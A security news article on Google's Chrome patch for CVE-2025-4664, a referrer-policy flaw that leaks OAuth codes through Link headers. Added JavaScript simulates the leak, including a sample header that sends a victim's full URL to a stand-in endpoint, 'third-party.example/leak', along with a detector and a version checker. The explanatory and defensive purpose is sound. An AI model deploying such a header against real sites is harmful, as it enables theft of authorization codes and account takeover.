
Google Patches Chrome Flaw that Can be Exploited to Take Over Accounts

Filip TRUȚĂ

May 15, 2025


Google has issued a security update to Chrome users worldwide after learning of a flaw that can enable motivated attackers to take over accounts.

“The Stable channel has been updated to 136.0.7103.113/.114 for Windows, Mac and 136.0.7103.113 for Linux which will roll out over the coming days/weeks,” writes Srinivas Sista on the Google Chrome releases blog. “This update includes 4 security fixes.”

In typical fashion, the announcement highlights the fixes contributed by external researchers, along with their CVE identifiers, and gives only scarce technical details so as not to hand opportunistic attackers a head start.

‘Insufficient policy enforcement’

The key issue addressed in this release, tracked as CVE-2025-4664, is described as an “insufficient policy enforcement in Loader.”

According to the GitHub Advisory Database, a motivated threat actor can exploit the issue remotely “to leak cross-origin data via a crafted HTML page.”

Google rates the bug’s severity high, and for good reason: in the scenario the researcher describes, it can leak secrets carried in a page’s URL, such as an OAuth authorization code, and lead to account takeover.

While Google is coy about the bug’s exploitability, the researcher who discovered and reported the flaw isn’t.

Identified as @slonser_, the researcher explains in a series of posts on X that, “unlike other browsers, Chrome resolves the Link header on subresource requests [and that] the Link header can set a referrer-policy.”

“We can specify unsafe-url and capture the full query parameters,” Slonser notes. “Query parameters can contain sensitive data - for example, in OAuth flows, this might lead to an Account Takeover. Developers rarely consider the possibility of stealing query parameters via an image from a 3rd-party resource - which makes this trick surprisingly useful sometimes.”
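To make the mechanism concrete, here is an added example that is not code from the article, from @slonser_, or from Chrome. It simulates two things the write-up describes: what the Referer header carries under each referrer policy, so the gap between the browser default and `unsafe-url` is visible, and a parser that flags Link response headers asking for `referrerpolicy=unsafe-url`, the shape of header a third-party image response would need to carry. It also shows the defensive step an OAuth callback page can take. The victim URL, the third-party hostnames, the header value and the function names are all constructed for illustration.

```javascript
// Added example: simulates referrer-policy behaviour and flags Link headers
// that request unsafe-url. Not Chrome code; URLs and header are constructed.

// Referer value for a request from documentUrl to targetUrl under policy,
// following the Referrer Policy spec: credentials and fragment are always
// stripped, and "downgrade" means an https document fetching an http target.
function computeReferer(documentUrl, targetUrl, policy) {
  const doc = new URL(documentUrl);
  const target = new URL(targetUrl);
  const sameOrigin = doc.origin === target.origin;
  const downgrade = doc.protocol === "https:" && target.protocol === "http:";
  const full = doc.origin + doc.pathname + doc.search; // query string included
  const originOnly = doc.origin + "/";
  switch (policy) {
    case "no-referrer": return null;
    case "unsafe-url": return full;
    case "origin": return originOnly;
    case "same-origin": return sameOrigin ? full : null;
    case "strict-origin": return downgrade ? null : originOnly;
    case "no-referrer-when-downgrade": return downgrade ? null : full;
    case "origin-when-cross-origin": return sameOrigin ? full : originOnly;
    case "strict-origin-when-cross-origin": // default in current browsers
      if (downgrade) return null;
      return sameOrigin ? full : originOnly;
    default: throw new Error("unknown referrer policy: " + policy);
  }
}

// Parse a Link response header (RFC 8288 subset: no quoted ';' or ',' inside
// values) into [{target, params}], resolving relative targets against the
// URL of the response that carried the header.
function parseLinkHeader(value, responseUrl) {
  const links = [];
  for (const part of value.split(/,(?=\s*<)/)) {
    const m = part.match(/^\s*<([^>]*)>\s*(.*)$/);
    if (!m) continue;
    const params = {};
    for (const piece of m[2].split(";")) {
      const kv = piece.trim();
      if (!kv) continue;
      const eq = kv.indexOf("=");
      const key = (eq === -1 ? kv : kv.slice(0, eq)).trim().toLowerCase();
      let val = eq === -1 ? "" : kv.slice(eq + 1).trim();
      if (val.length >= 2 && val.startsWith('"') && val.endsWith('"')) {
        val = val.slice(1, -1);
      }
      params[key] = val;
    }
    links.push({ target: new URL(m[1], responseUrl).href, params });
  }
  return links;
}

// Links that ask the browser to fetch the target with unsafe-url, i.e. with
// the document's full URL (query string included) in the Referer header.
function findUnsafeUrlLinks(headerValue, responseUrl) {
  return parseLinkHeader(headerValue, responseUrl).filter(
    (l) => (l.params.referrerpolicy || "").toLowerCase() === "unsafe-url"
  );
}

// Defensive side: read code and state out of the callback URL and return the
// URL the page should swap in via history.replaceState() before any
// third-party subresource is allowed to load.
function scrubOAuthCallback(callbackUrl) {
  const u = new URL(callbackUrl);
  const code = u.searchParams.get("code");
  const state = u.searchParams.get("state");
  u.searchParams.delete("code");
  u.searchParams.delete("state");
  return { code, state, cleanUrl: u.href };
}

// Walk the scenario: victim sits on an OAuth callback URL, an <img> from a
// third party is fetched, and that image response carries the Link header.
function demo() {
  const victimPage = "https://app.example/oauth/callback?code=AUTHCODE123&state=xyz";
  const imageUrl = "https://third-party.example/pixel.png";
  const linkHeader =
    '<https://third-party.example/leak>; rel="preload"; as="image"; referrerpolicy="unsafe-url"';
  const preload = findUnsafeUrlLinks(linkHeader, imageUrl)[0];
  return {
    // the <img> itself, under the default policy: origin only, nothing leaks
    imageReferer: computeReferer(victimPage, imageUrl, "strict-origin-when-cross-origin"),
    preloadTarget: preload.target,
    // the header-triggered fetch, under the policy the header asked for
    preloadReferer: computeReferer(victimPage, preload.target, preload.params.referrerpolicy),
    scrubbed: scrubOAuthCallback(victimPage).cleanUrl,
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The `imageReferer` and `preloadReferer` values side by side are the whole bug: the same page, the same third-party origin, but one request carries `https://app.example/` and the other carries the authorization code. Note that scrubbing the URL only narrows the window; PKCE and a single-use, short-lived code are what make a leaked code worthless to an attacker.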

Update your browser!

“Google is aware of reports that an exploit for CVE-2025-4664 exists in the wild,” says the web giant.

It doesn’t clarify if the exploit is Slonser’s proof-of-concept or if motivated attackers have been quick to exploit the weakness for malicious purposes.

It’s worth noting that Slonser disclosed his findings publicly on X long before Google issued the Chrome update containing the fix.

Even if you don’t consider yourself a target for hackers, Bitdefender recommends you deploy the latest updates for all your personal devices the moment they're available, especially when the vendor rates the risk level high, and even more so if the addressed issues are said to be exploited in the wild.

As of today, Chrome users will want to be on:

·      Chrome 136.0.7103.113/.114 for Windows and Mac

·      Chrome 136.0.7103.113 on Linux

·      Chrome 136.0.7103.125 on Android

Chrome users on iOS/iPadOS are unaffected, so there’s no special security update for the iPhone/iPad version of the browser this time around.
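For anyone checking a fleet rather than a single laptop, here is an added example (not from the article or from Google) that compares an installed Chrome build against the fixed versions listed above. The point it makes is that Chrome versions have to be compared component by component: as plain strings, "136.0.7103.99" sorts after "136.0.7103.113" and would wrongly pass. The platform keys and function names are assumptions.

```javascript
// Added example: is an installed Chrome build at or above the fixed version
// for its platform? Fixed versions are the ones the article lists.
const FIXED_VERSIONS = {
  windows: "136.0.7103.113",
  mac: "136.0.7103.113",
  linux: "136.0.7103.113",
  android: "136.0.7103.125",
  ios: null, // unaffected per Google; no minimum version to enforce
};

// Numeric, component-wise comparison: -1, 0 or 1 like a sort comparator.
function compareVersions(a, b) {
  const pa = a.split(".").map(Number);
  const pb = b.split(".").map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return Math.sign(d);
  }
  return 0;
}

function isPatched(platform, installed) {
  const key = platform.toLowerCase();
  if (!(key in FIXED_VERSIONS)) throw new Error("unknown platform: " + platform);
  if (!/^\d+(\.\d+){3}$/.test(installed)) throw new Error("bad version: " + installed);
  const fixed = FIXED_VERSIONS[key];
  if (fixed === null) return true; // platform not affected by this advisory
  return compareVersions(installed, fixed) >= 0;
}

console.log(isPatched("windows", "136.0.7103.114"), isPatched("android", "136.0.7103.113"));
```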

The desktop version of Chrome is programmed to check for the latest version on every relaunch. Start the process manually if you haven’t closed Chrome in a while. Visit the three-dotted options menu, choose Settings -> About Chrome, and let the browser fetch the latest version from Google’s servers. When prompted, relaunch Chrome.

Android releases contain the same security fixes as the desktop version of Chrome, unless otherwise noted by Google.

To patch Chrome on your Android device, visit the official Google Play Store and download the latest version.

For peace of mind, consider running a security solution on all your devices.
